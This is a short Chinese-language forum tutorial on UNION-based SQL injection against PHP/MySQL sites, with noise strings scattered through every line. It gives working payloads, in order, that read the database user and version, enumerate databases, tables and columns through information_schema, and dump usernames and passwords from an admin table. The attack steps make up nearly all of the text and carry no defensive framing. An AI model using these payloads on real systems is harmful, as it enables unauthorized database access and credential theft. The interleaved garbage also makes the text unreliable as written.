, B1 E4 G2 R# q" d( Y: `( Z教程内容:Mysql 5+php 注入$ W- q5 |$ U5 e8 P( |) Z+ g6 V
- f; F3 X, _5 O( F4 O- E: y0 D+ q; C$ w4 X' v7 A
, ~5 S/ T" s3 W* n7 O V; n5 T% q一.查看MYSQL基本信息(库名,版本,用户)
4 @' B& {, ]9 _ p9 q" w
5 g* t* w+ `, e$ @and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*8 w8 Y6 {! Z; |0 o. q( x) n7 R
* p4 ^8 K) u: W/ A
二.查数据库
# n" ]# v- J8 ?, }$ z* n
0 C7 a0 w9 a) w7 {" j) w1 Eand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
9 c3 D( k. j2 s2 A2 Q, Ulimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。" k& q \' d2 N, |: k. _
% `! Y( S; q1 I) A1 U
三.暴表+ t+ x) Y3 F/ }5 r& C& q+ p( U
$ t' c; m' @: r4 D1 B+ X0 \/ W/ w' S
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
! Z7 K. I/ a" z" ?0 d. }
8 k7 v& ?2 o1 {: |* f( a: t$ Hlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。 H7 z3 O( |7 Y
( f1 Z8 C" f) {* a5 F& C四.暴字段
6 [' X/ [: s2 X' A* C, k; _7 Y7 }: v7 q7 X6 Y
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*6 e- ^5 M0 h+ W: v& N, C
6 ]1 w9 P. y* _& e! |9 m6 \/ P
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。0 ^5 J [# m& q& |
% J. J1 i1 K6 d7 u& m
五.暴数据6 E$ J2 v0 b% h/ g: p
3 w; u! V0 |4 P0 Y% xand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
; N P; ]' ~5 `$ D E1 w \* V: N2 ?+ `5 M
. r& Z8 Z3 [; P s9 m
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。" h7 t( J- y7 s2 W! l( r) `; b* Y3 `# w
|